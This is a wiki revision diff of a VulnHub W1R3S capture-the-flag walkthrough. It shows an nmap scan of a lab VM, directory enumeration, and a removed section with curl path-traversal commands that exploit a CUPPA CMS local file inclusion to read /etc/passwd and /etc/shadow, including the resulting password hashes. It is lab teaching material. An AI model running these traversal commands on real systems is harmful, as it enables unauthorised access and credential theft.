Difference between revisions of "W1R3S: 1.0.1 ~ VulnHub - CTF Walkthrough"

m (Enumeration)
m (Enumeration)
Line 42: Line 42:
 
</syntaxhighlight>
 
</syntaxhighlight>
  
A quick checked  of '''WordPress''' with '''wp-scan''' did not reveal anything interesting. Gut feel tells me to put that aside and move to '''CUPPA''' older versions of which, according to google, come with a '''LFI''' vulnerability.  
+
A quick checked  of '''WordPress''' with '''wp-scan''' did not reveal anything interesting. Gut feel tells me to put that aside and move to '''CUPPA''' older versions of which, according to google, come with a '''LFI''' vulnerability.
<syntaxhighlight  lang=shell-session highlight="4" line>
 
root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://localhost/administrator/alerts/alertConfigField.php |grep sbin
 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 
bin:x:2:2:bin:/bin:/usr/sbin/nologin
 
sys:x:3:3:sys:/dev:/usr/sbin/nologin
 
......
 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
 
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
 
</syntaxhighlight>
 
And taking it a step further...
 
<syntaxhighlight  lang=shell-session highlight="" line>
 
root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://localhost/administrator/alerts/alertConfigField.php
 
...
 
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
 
...
 
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:999...
 
</syntaxhighlight>
 
  
 
=== Exploitation ===
 
=== Exploitation ===

Revision as of 17:32, 20 June 2018

Objective

xxxxxxxxxxxxxxxxxxxxx

Source: [xxxxxx]

Status: [Completed]

Methodology

Discovery

root@blaksec:/ # export TANGO=192.168.56.101
root@kali:~/Desktop/w1r3s# nmap -O -sT -sV -p- -T5 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-26 19:01 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00093s latency).
Not shown: 55528 filtered ports, 10003 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 08:00:27:CB:EE:8B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Entry Point #1 - Port 80 (HTTP)

Enumeration

A quick scan with dirb came back with two directories wordpress and administrator. The former runs the obvious - Word Press, the latter - CUPPA CMS

WordPress is configured to run under localhost so we need to update /etc/hosts

192.168.56.101 localhost

A quick checked of WordPress with wp-scan did not reveal anything interesting. Gut feel tells me to put that aside and move to CUPPA older versions of which, according to google, come with a LFI vulnerability.

Exploitation

xxx xxx xxx

xxx
xxx

xxx

xxx
xxx


Final Notes

xxx

Appendix A: Vulnerability Detail and Mitigation

xxx
Rating High
Description xxxx
Impact xxxxxxxxxxxxxxxxxxxxxxxxxxxx
Remediation xxxxxxxxxxxxxxxxx